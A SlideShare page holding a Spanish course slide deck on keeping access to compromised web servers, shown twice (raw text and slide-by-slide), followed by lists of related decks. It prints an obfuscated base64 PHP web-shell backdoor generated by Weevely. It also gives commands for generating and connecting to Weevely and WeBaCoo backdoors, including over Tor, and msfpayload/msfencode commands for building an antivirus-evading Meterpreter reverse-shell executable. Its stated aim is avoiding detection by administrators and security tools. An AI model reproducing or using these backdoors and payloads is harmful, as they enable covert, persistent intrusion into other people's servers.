SlideShare uma empresa Scribd logo
1 de 44
Clase 6
26-09-2013
 Una vez que se tiene acceso a la página web (objetivo), tenemos que mantener el
acceso para su uso futuro, porque no queremos estar empezando desde cero una
y otra vez.
 Con el fin de evitar esto, podemos cargar las shell's web o puertas traseras a la
página web. La codificación de la puerta trasera también es importante, ya que no
debe crear "ruido" una vez cargado en el servidor.
 Si es así, entonces los administradores pueden fácilmente detectar y eliminar las
puertas traseras.
 En la suite de Backtrack5 R3 se incorporan buenas herramientas para llevar a
cabo este proceso, como lo es Weevely.
 Es una herramienta esencial para la explotación posterior de aplicaciones web, y
se puede utilizar como puerta trasera o como una shell web para gestionar las
cuentas web.
 Weevely busca funciones como system(), passthru(), popen(), exec(),
proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()) utilizando
las funciones activadas en una servidor remoto.
 El código siguiente es un ejemplo del código de la puerta trasera creada por
Weevely.
 -----------------------------------------------------------------------------------------------------------
--------
 eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSw
k
YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPG
Zv
c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK
GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz
4nO30='));
 -----------------------------------------------------------------------------------------------------------
--------
 Se ubica en: Applications - BackTrack - Maintaining Access - Web BackDoors -
Weevely
 Uso:
 /pentest/backdoors/web/weevely# ./weevely.py generate password
/root/back.php
 Posteriormente:
 /pentest/backdoors/web/weevely# ./weevely.py http://www.sitio-
web.com/back.php password
 WeBaCoo (Web Backdoor Cookie) es un backdoor que proporciona una terminal
de conexión a través de HTTP entre el cliente y el servidor web.
 Se trata de una herramienta de explotación para mantener el acceso a un servidor
web (hacked).
 Fue diseñado para operar bajo el radar de la moderna puesta al anticuado AV,
NIDS, IPS, Network Firewalls y Application Firewalls, lo que demuestra un
mecanismo de sigilo para ejecutar comandos en el servidor comprometido.
 El archivo ofuscado realiza comunicación mediante HTTP header's Cookie
validando solicitudes y respuestas HTTP del servidor web.
 WeBaCoo ofrece un modo de generar el código para crear el PHP backdoor,
usando payloads predefinidos.
 También ofrece la "terminal" el modo en que el usuario puede establecer una
remota conexión con el servidor y ejecutar comandos con privilegios deseados
del servicio web.
 En la suite de Kali se incorporan buenas herramientas para llevar a cabo este
proceso, como lo es Webacoo.
 Se ubica en: Applications - BackTrack - Maintaining Access - Web BackDoors -
Weevely
 1) Crear backdoor ofuscado 'backdoor.php' con la configuración predeterminada:
./webacoo.pl -g -o backdoor.php
 2) Crear 'raw-backdoor.php' backdoor des-ofuscado usando la funciona "transito":
./webacoo.pl -g -o raw-backdoor.php -f 4 -r
 3) Establecer "terminal" conexión con el host remoto usando la configuración por
defecto:
 ./webacoo.pl -t -u http://127.0.0.1/backdoor.php
 4) Establecer "terminal" conexión con el host remoto al configurar algunos
argumentos:
 ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"
 5) Establecer "terminal" conexión con el host remoto a través de proxy HTTP:
./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080
 6) Establecer "terminal" conexión con el host remoto a través de HTTP proxy con
autenticación básica:
 ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128
 7) Establecer "terminal" conexión con el host remoto a través de Tor y registrar la
actividad:
 ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt
 Primero generamos nuestro backdoor el cual tiene una configuración
predeterminada, como se muestra a continuación
 Posteriormente verificamos que el backdoor se haya creado
 Una vez que el backdoor se encuentra alojado en el sitio que deseamos controlar
y atacar ejecutaremos lo siguiente
 ./webacoo.pl -t -u http://paginaweb.com/backdoor.php
 Si todo ha ido bien nos aparecerá lo siguiente
 Una vez establecida la conexión podemos teclear help para darnos una idea de la
instrucciones que podemos ejecutar
 Metasploit se puede utilizar para crear puertas traseras que luego pueden ser
utilizados para mantener el acceso en el servidor web.
 Esto se puede hacer con la ayuda de Msfpayload.
 Los pasos para crear puerta trasera en Msfpayload son como sigue:
 Tenemos que seleccionar el Payload que vamos a utilizar para obtener un shell
Meterpreter generado a través de una conexión TCP inverso.
 El comando sería:
 msfpayload windows/meterpreter/reverse_tcp
 Este Payload tiene dos parámetros:
 LHOST (nuestra IP) y el LPORT para seleccionar el puerto que vamos a utilizar.
 La "R" se utiliza para dar al archivo de salida en formato de datos RAW para que
podamos codificar posteriormente.
 Su instrucción seria
 msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234
 Este comando creará el Payload, pero tiene que ser codificado con el fin de evitar
la detección de los antivirus, para tal caso se puede hacer usando la opción
msfencode, para hacer esto, necesitamos usar barra vertical ("|")
 Su instrucción seria
 windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode
–e x86/shikata_ga_nai –t exe >> bucker.exe
 Nota:
 -e se usa para especificar el tipo de codificación necesario, en este caso se esta
usando la codificación shikata_ga_nai (Shikata ga nai es una técnica de
codificación que permite evadir más del 50% de antivirus del mercado) y -t para
el tipo de extensión del archivo (exe).
 Este comando creará el Payload, pero tiene que ser codificado con el fin de evitar
la detección de los antivirus, para tal caso se puede hacer usando la opción
msfencode, para hacer esto, necesitamos usar barra vertical ("|")
 Su instrucción seria
 windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode
–e x86/shikata_ga_nai –t exe >> bucker.exe
 Nota:
 -e se usa para especificar el tipo de codificación necesario, en este caso se esta
usando la codificación shikata_ga_nai (Shikata ga nai es una técnica de
codificación que permite evadir más del 50% de antivirus del mercado) y -t para
el tipo de extensión del archivo (exe).
 Por ejemplo, si deseamos ver la lista de los codificadores disponibles en MSF,
usamos el siguiente comando:
 msfpayload windows/meterpreter/reverse_tcp –l
 Como se denota a continuación
 Estos son sólo unos pocos métodos que se pueden seguir para realizar la
explotación de las vulnerabilidades en una aplicación web.
 Una vez que tengamos la información acerca de nuestro objetivo, tratar de realizar
una evaluación de la vulnerabilidad con el fin de obtener información sobre los
exploits que se pueden utilizar.
 Una vez hecho esto, explotar las vulnerabilidades y si es necesario, cargar un
backdoor, pero antes de eso, se debe codificar el backdoor con el fin de evitar la
detección.

Mais conteúdo relacionado

Mais procurados

Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
RootedCON
 
Aircrack ng: comandos básicos
Aircrack ng: comandos básicosAircrack ng: comandos básicos
Aircrack ng: comandos básicos
JIvanC
 
Seguridad en Servidores CentOS con Elastix + Buenas Prácticas
Seguridad en Servidores CentOS con Elastix + Buenas PrácticasSeguridad en Servidores CentOS con Elastix + Buenas Prácticas
Seguridad en Servidores CentOS con Elastix + Buenas Prácticas
rodrimartin
 

Mais procurados (20)

Ataque DNS Spoofing
Ataque DNS SpoofingAtaque DNS Spoofing
Ataque DNS Spoofing
 
Ataque por dns spooging y troyano
Ataque por dns spooging y troyanoAtaque por dns spooging y troyano
Ataque por dns spooging y troyano
 
Dns spoofing kali linux
Dns spoofing kali linuxDns spoofing kali linux
Dns spoofing kali linux
 
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
Jesús Olmos - ChromeHack, a html5/chrome webhack tool [Rooted CON 2013]
 
Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2
 
Ataque sql web
Ataque sql webAtaque sql web
Ataque sql web
 
Ataque win xp
Ataque win xpAtaque win xp
Ataque win xp
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebas
 
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
 
2. ataque por inyección de código sql a sitio web
2. ataque por inyección de código sql a sitio web2. ataque por inyección de código sql a sitio web
2. ataque por inyección de código sql a sitio web
 
0 entorno php
0 entorno php0 entorno php
0 entorno php
 
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
 
Entorno PHP
Entorno PHPEntorno PHP
Entorno PHP
 
Aircrack ng: comandos básicos
Aircrack ng: comandos básicosAircrack ng: comandos básicos
Aircrack ng: comandos básicos
 
Monitoreando servidores Elastix con Nagios
Monitoreando servidores Elastix con NagiosMonitoreando servidores Elastix con Nagios
Monitoreando servidores Elastix con Nagios
 
Fail2 ban
Fail2 banFail2 ban
Fail2 ban
 
Seguridad en Servidores CentOS con Elastix + Buenas Prácticas
Seguridad en Servidores CentOS con Elastix + Buenas PrácticasSeguridad en Servidores CentOS con Elastix + Buenas Prácticas
Seguridad en Servidores CentOS con Elastix + Buenas Prácticas
 
Pablo sanemeteriovalencia
Pablo sanemeteriovalenciaPablo sanemeteriovalencia
Pablo sanemeteriovalencia
 
Conferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical HackingConferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical Hacking
 
Crack redes wifi
Crack redes wifiCrack redes wifi
Crack redes wifi
 

Destaque (7)

Curso basicoseguridadweb slideshare11
Curso basicoseguridadweb slideshare11Curso basicoseguridadweb slideshare11
Curso basicoseguridadweb slideshare11
 
Web crawlers
Web crawlersWeb crawlers
Web crawlers
 
Curso basicoseguridadweb slideshare7
Curso basicoseguridadweb slideshare7Curso basicoseguridadweb slideshare7
Curso basicoseguridadweb slideshare7
 
Curso basicoseguridadweb slideshare3
Curso basicoseguridadweb slideshare3Curso basicoseguridadweb slideshare3
Curso basicoseguridadweb slideshare3
 
Curso basicoseguridadweb slideshare10
Curso basicoseguridadweb slideshare10Curso basicoseguridadweb slideshare10
Curso basicoseguridadweb slideshare10
 
Ethical hacking 02
Ethical hacking 02Ethical hacking 02
Ethical hacking 02
 
Cadenas y funciones de cadena
Cadenas y funciones de cadenaCadenas y funciones de cadena
Cadenas y funciones de cadena
 

Semelhante a Maitaining access

Trabajo de seguridad informatica 1
Trabajo de seguridad informatica 1Trabajo de seguridad informatica 1
Trabajo de seguridad informatica 1
Carlos Alderete
 
Episodio de pentesting
Episodio de pentestingEpisodio de pentesting
Episodio de pentesting
akencito
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntu
David Vevelas
 

Semelhante a Maitaining access (20)

Airbase y KARMetasploit
Airbase y KARMetasploitAirbase y KARMetasploit
Airbase y KARMetasploit
 
Trabajo final seguridad ofensiva defensiva
Trabajo final seguridad ofensiva defensivaTrabajo final seguridad ofensiva defensiva
Trabajo final seguridad ofensiva defensiva
 
Trabajo de seguridad informatica 1
Trabajo de seguridad informatica 1Trabajo de seguridad informatica 1
Trabajo de seguridad informatica 1
 
Webinar Gratuito: "Tomar Control de un Servidor con Armitage"
Webinar Gratuito: "Tomar Control de un Servidor con Armitage"Webinar Gratuito: "Tomar Control de un Servidor con Armitage"
Webinar Gratuito: "Tomar Control de un Servidor con Armitage"
 
Episodio de pentesting
Episodio de pentestingEpisodio de pentesting
Episodio de pentesting
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebas
 
Present3
Present3Present3
Present3
 
Lab 3 cifrado criptografia
Lab 3   cifrado criptografiaLab 3   cifrado criptografia
Lab 3 cifrado criptografia
 
Beef framework 2016
Beef framework 2016Beef framework 2016
Beef framework 2016
 
INSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSLINSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSL
 
Team.docx
Team.docxTeam.docx
Team.docx
 
Internal.docx
Internal.docxInternal.docx
Internal.docx
 
Guia basica-securizacion-apache
Guia basica-securizacion-apacheGuia basica-securizacion-apache
Guia basica-securizacion-apache
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntu
 
Servicio VPN con OpenVPN y Latch sobre Raspberry Pi
Servicio VPN con OpenVPN y Latch sobre Raspberry PiServicio VPN con OpenVPN y Latch sobre Raspberry Pi
Servicio VPN con OpenVPN y Latch sobre Raspberry Pi
 
Nagios
NagiosNagios
Nagios
 
William fabricio manual de sistemas sas
William fabricio manual de sistemas sasWilliam fabricio manual de sistemas sas
William fabricio manual de sistemas sas
 
Instalación KOHA: desarrollo, requerimientos y configuración
Instalación KOHA: desarrollo, requerimientos y configuraciónInstalación KOHA: desarrollo, requerimientos y configuración
Instalación KOHA: desarrollo, requerimientos y configuración
 
APIREST LARAVEL Y PHP.pptx
APIREST LARAVEL Y PHP.pptxAPIREST LARAVEL Y PHP.pptx
APIREST LARAVEL Y PHP.pptx
 
Observium
ObserviumObservium
Observium
 

Mais de Tensor

Mais de Tensor (20)

Libertad
LibertadLibertad
Libertad
 
Método de la regla falsa (o metodo de la falsa posición)
Método de la regla falsa (o metodo de la falsa posición)Método de la regla falsa (o metodo de la falsa posición)
Método de la regla falsa (o metodo de la falsa posición)
 
Metodo de la bisección
Metodo de la bisecciónMetodo de la bisección
Metodo de la bisección
 
Transito vehicular
Transito vehicularTransito vehicular
Transito vehicular
 
Teoria de colas
Teoria de colasTeoria de colas
Teoria de colas
 
Practica 7 2016
Practica 7 2016Practica 7 2016
Practica 7 2016
 
Practica 6 2016
Practica 6 2016Practica 6 2016
Practica 6 2016
 
Game maker
Game makerGame maker
Game maker
 
Practica 5 2016
Practica 5 2016Practica 5 2016
Practica 5 2016
 
Procesamiento de archivos
Procesamiento de archivosProcesamiento de archivos
Procesamiento de archivos
 
Simulación en promodel clase 04
Simulación en promodel clase 04Simulación en promodel clase 04
Simulación en promodel clase 04
 
Reduccion de orden
Reduccion de ordenReduccion de orden
Reduccion de orden
 
Variación+de+parametros
Variación+de+parametrosVariación+de+parametros
Variación+de+parametros
 
Coeficientes indeterminados enfoque de superposición
Coeficientes indeterminados   enfoque de superposiciónCoeficientes indeterminados   enfoque de superposición
Coeficientes indeterminados enfoque de superposición
 
Bernoulli y ricatti
Bernoulli y ricattiBernoulli y ricatti
Bernoulli y ricatti
 
Practica no. 3 tiempo de servicio
Practica no. 3 tiempo de servicioPractica no. 3 tiempo de servicio
Practica no. 3 tiempo de servicio
 
Clase 14 ondas reflejadas
Clase 14 ondas reflejadasClase 14 ondas reflejadas
Clase 14 ondas reflejadas
 
Ondas em
Ondas emOndas em
Ondas em
 
Clase 7 ondas electromagneticas
Clase 7 ondas electromagneticasClase 7 ondas electromagneticas
Clase 7 ondas electromagneticas
 
Practicas 8 2016
Practicas 8 2016Practicas 8 2016
Practicas 8 2016
 

Último

PROPUESTA COMERCIAL SENA ETAPA 2 ACTIVIDAD 3.pdf
PROPUESTA COMERCIAL SENA ETAPA 2 ACTIVIDAD 3.pdfPROPUESTA COMERCIAL SENA ETAPA 2 ACTIVIDAD 3.pdf
PROPUESTA COMERCIAL SENA ETAPA 2 ACTIVIDAD 3.pdf
EduardoJosVargasCama1
 

Último (20)

Los avatares para el juego dramático en entornos virtuales
Los avatares para el juego dramático en entornos virtualesLos avatares para el juego dramático en entornos virtuales
Los avatares para el juego dramático en entornos virtuales
 
Tema 17. Biología de los microorganismos 2024
Tema 17. Biología de los microorganismos 2024Tema 17. Biología de los microorganismos 2024
Tema 17. Biología de los microorganismos 2024
 
LA LITERATURA DEL BARROCO 2023-2024pptx.pptx
LA LITERATURA DEL BARROCO 2023-2024pptx.pptxLA LITERATURA DEL BARROCO 2023-2024pptx.pptx
LA LITERATURA DEL BARROCO 2023-2024pptx.pptx
 
ACRÓNIMO DE PARÍS PARA SU OLIMPIADA 2024. Por JAVIER SOLIS NOYOLA
ACRÓNIMO DE PARÍS PARA SU OLIMPIADA 2024. Por JAVIER SOLIS NOYOLAACRÓNIMO DE PARÍS PARA SU OLIMPIADA 2024. Por JAVIER SOLIS NOYOLA
ACRÓNIMO DE PARÍS PARA SU OLIMPIADA 2024. Por JAVIER SOLIS NOYOLA
 
Desarrollo y Aplicación de la Administración por Valores
Desarrollo y Aplicación de la Administración por ValoresDesarrollo y Aplicación de la Administración por Valores
Desarrollo y Aplicación de la Administración por Valores
 
PROPUESTA COMERCIAL SENA ETAPA 2 ACTIVIDAD 3.pdf
PROPUESTA COMERCIAL SENA ETAPA 2 ACTIVIDAD 3.pdfPROPUESTA COMERCIAL SENA ETAPA 2 ACTIVIDAD 3.pdf
PROPUESTA COMERCIAL SENA ETAPA 2 ACTIVIDAD 3.pdf
 
Código Civil de la República Bolivariana de Venezuela
Código Civil de la República Bolivariana de VenezuelaCódigo Civil de la República Bolivariana de Venezuela
Código Civil de la República Bolivariana de Venezuela
 
Tema 10. Dinámica y funciones de la Atmosfera 2024
Tema 10. Dinámica y funciones de la Atmosfera 2024Tema 10. Dinámica y funciones de la Atmosfera 2024
Tema 10. Dinámica y funciones de la Atmosfera 2024
 
Actividades para el 11 de Mayo día del himno.docx
Actividades para el 11 de Mayo día del himno.docxActividades para el 11 de Mayo día del himno.docx
Actividades para el 11 de Mayo día del himno.docx
 
Revista Apuntes de Historia. Mayo 2024.pdf
Revista Apuntes de Historia. Mayo 2024.pdfRevista Apuntes de Historia. Mayo 2024.pdf
Revista Apuntes de Historia. Mayo 2024.pdf
 
Supuestos_prácticos_funciones.docx
Supuestos_prácticos_funciones.docxSupuestos_prácticos_funciones.docx
Supuestos_prácticos_funciones.docx
 
prostitución en España: una mirada integral!
prostitución en España: una mirada integral!prostitución en España: una mirada integral!
prostitución en España: una mirada integral!
 
Feliz Día de la Madre - 5 de Mayo, 2024.pdf
Feliz Día de la Madre - 5 de Mayo, 2024.pdfFeliz Día de la Madre - 5 de Mayo, 2024.pdf
Feliz Día de la Madre - 5 de Mayo, 2024.pdf
 
Posición astronómica y geográfica de Europa.pptx
Posición astronómica y geográfica de Europa.pptxPosición astronómica y geográfica de Europa.pptx
Posición astronómica y geográfica de Europa.pptx
 
Tema 19. Inmunología y el sistema inmunitario 2024
Tema 19. Inmunología y el sistema inmunitario 2024Tema 19. Inmunología y el sistema inmunitario 2024
Tema 19. Inmunología y el sistema inmunitario 2024
 
Biografía de Charles Coulomb física .pdf
Biografía de Charles Coulomb física .pdfBiografía de Charles Coulomb física .pdf
Biografía de Charles Coulomb física .pdf
 
SISTEMA RESPIRATORIO PARA NIÑOS PRIMARIA
SISTEMA RESPIRATORIO PARA NIÑOS PRIMARIASISTEMA RESPIRATORIO PARA NIÑOS PRIMARIA
SISTEMA RESPIRATORIO PARA NIÑOS PRIMARIA
 
Factores que intervienen en la Administración por Valores.pdf
Factores que intervienen en la Administración por Valores.pdfFactores que intervienen en la Administración por Valores.pdf
Factores que intervienen en la Administración por Valores.pdf
 
Los dos testigos. Testifican de la Verdad
Los dos testigos. Testifican de la VerdadLos dos testigos. Testifican de la Verdad
Los dos testigos. Testifican de la Verdad
 
PLAN LECTOR 2024 integrado nivel inicial-miercoles 10.pptx
PLAN LECTOR 2024  integrado nivel inicial-miercoles 10.pptxPLAN LECTOR 2024  integrado nivel inicial-miercoles 10.pptx
PLAN LECTOR 2024 integrado nivel inicial-miercoles 10.pptx
 

Maitaining access

  • 2.  Una vez que se tiene acceso a la página web (objetivo), tenemos que mantener el acceso para su uso futuro, porque no queremos estar empezando desde cero una y otra vez.  Con el fin de evitar esto, podemos cargar las shell's web o puertas traseras a la página web. La codificación de la puerta trasera también es importante, ya que no debe crear "ruido" una vez cargado en el servidor.  Si es así, entonces los administradores pueden fácilmente detectar y eliminar las puertas traseras.
  • 3.  En la suite de Backtrack5 R3 se incorporan buenas herramientas para llevar a cabo este proceso, como lo es Weevely.
  • 4.  Es una herramienta esencial para la explotación posterior de aplicaciones web, y se puede utilizar como puerta trasera o como una shell web para gestionar las cuentas web.  Weevely busca funciones como system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()) utilizando las funciones activadas en una servidor remoto.  El código siguiente es un ejemplo del código de la puerta trasera creada por Weevely.
  • 6.  Se ubica en: Applications - BackTrack - Maintaining Access - Web BackDoors - Weevely
  • 7.
  • 8.
  • 9.  Uso:  /pentest/backdoors/web/weevely# ./weevely.py generate password /root/back.php
  • 10.
  • 11.
  • 12.  Posteriormente:  /pentest/backdoors/web/weevely# ./weevely.py http://www.sitio- web.com/back.php password
  • 13.
  • 14.
  • 15.
  • 16.  WeBaCoo (Web Backdoor Cookie) es un backdoor que proporciona una terminal de conexión a través de HTTP entre el cliente y el servidor web.  Se trata de una herramienta de explotación para mantener el acceso a un servidor web (hacked).  Fue diseñado para operar bajo el radar de la moderna puesta al anticuado AV, NIDS, IPS, Network Firewalls y Application Firewalls, lo que demuestra un mecanismo de sigilo para ejecutar comandos en el servidor comprometido.
  • 17.  El archivo ofuscado realiza comunicación mediante HTTP header's Cookie validando solicitudes y respuestas HTTP del servidor web.  WeBaCoo ofrece un modo de generar el código para crear el PHP backdoor, usando payloads predefinidos.  También ofrece la "terminal" el modo en que el usuario puede establecer una remota conexión con el servidor y ejecutar comandos con privilegios deseados del servicio web.
  • 18.  En la suite de Kali se incorporan buenas herramientas para llevar a cabo este proceso, como lo es Webacoo.
  • 19.  Se ubica en: Applications - BackTrack - Maintaining Access - Web BackDoors - Weevely
  • 20.
  • 21.
  • 22.  1) Crear backdoor ofuscado 'backdoor.php' con la configuración predeterminada: ./webacoo.pl -g -o backdoor.php  2) Crear 'raw-backdoor.php' backdoor des-ofuscado usando la funciona "transito": ./webacoo.pl -g -o raw-backdoor.php -f 4 -r  3) Establecer "terminal" conexión con el host remoto usando la configuración por defecto:  ./webacoo.pl -t -u http://127.0.0.1/backdoor.php  4) Establecer "terminal" conexión con el host remoto al configurar algunos argumentos:  ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"
  • 23.  5) Establecer "terminal" conexión con el host remoto a través de proxy HTTP: ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080  6) Establecer "terminal" conexión con el host remoto a través de HTTP proxy con autenticación básica:  ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128  7) Establecer "terminal" conexión con el host remoto a través de Tor y registrar la actividad:  ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt
  • 24.  Primero generamos nuestro backdoor el cual tiene una configuración predeterminada, como se muestra a continuación
  • 25.
  • 26.  Posteriormente verificamos que el backdoor se haya creado
  • 27.
  • 28.  Una vez que el backdoor se encuentra alojado en el sitio que deseamos controlar y atacar ejecutaremos lo siguiente  ./webacoo.pl -t -u http://paginaweb.com/backdoor.php
  • 29.
  • 30.  Si todo ha ido bien nos aparecerá lo siguiente
  • 31.
  • 32.
  • 33.  Una vez establecida la conexión podemos teclear help para darnos una idea de la instrucciones que podemos ejecutar
  • 34.
  • 35.
  • 36.  Metasploit se puede utilizar para crear puertas traseras que luego pueden ser utilizados para mantener el acceso en el servidor web.  Esto se puede hacer con la ayuda de Msfpayload.  Los pasos para crear puerta trasera en Msfpayload son como sigue:  Tenemos que seleccionar el Payload que vamos a utilizar para obtener un shell Meterpreter generado a través de una conexión TCP inverso.  El comando sería:  msfpayload windows/meterpreter/reverse_tcp
  • 37.  Este Payload tiene dos parámetros:  LHOST (nuestra IP) y el LPORT para seleccionar el puerto que vamos a utilizar.  La "R" se utiliza para dar al archivo de salida en formato de datos RAW para que podamos codificar posteriormente.  Su instrucción seria  msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234
  • 38.  Este comando creará el Payload, pero tiene que ser codificado con el fin de evitar la detección de los antivirus, para tal caso se puede hacer usando la opción msfencode, para hacer esto, necesitamos usar barra vertical ("|")  Su instrucción seria  windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode –e x86/shikata_ga_nai –t exe >> bucker.exe  Nota:  -e se usa para especificar el tipo de codificación necesario, en este caso se esta usando la codificación shikata_ga_nai (Shikata ga nai es una técnica de codificación que permite evadir más del 50% de antivirus del mercado) y -t para el tipo de extensión del archivo (exe).
  • 39.  Este comando creará el Payload, pero tiene que ser codificado con el fin de evitar la detección de los antivirus, para tal caso se puede hacer usando la opción msfencode, para hacer esto, necesitamos usar barra vertical ("|")  Su instrucción seria  windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode –e x86/shikata_ga_nai –t exe >> bucker.exe  Nota:  -e se usa para especificar el tipo de codificación necesario, en este caso se esta usando la codificación shikata_ga_nai (Shikata ga nai es una técnica de codificación que permite evadir más del 50% de antivirus del mercado) y -t para el tipo de extensión del archivo (exe).
  • 40.  Por ejemplo, si deseamos ver la lista de los codificadores disponibles en MSF, usamos el siguiente comando:  msfpayload windows/meterpreter/reverse_tcp –l  Como se denota a continuación
  • 41.
  • 42.
  • 43.
  • 44.  Estos son sólo unos pocos métodos que se pueden seguir para realizar la explotación de las vulnerabilidades en una aplicación web.  Una vez que tengamos la información acerca de nuestro objetivo, tratar de realizar una evaluación de la vulnerabilidad con el fin de obtener información sobre los exploits que se pueden utilizar.  Una vez hecho esto, explotar las vulnerabilidades y si es necesario, cargar un backdoor, pero antes de eso, se debe codificar el backdoor con el fin de evitar la detección.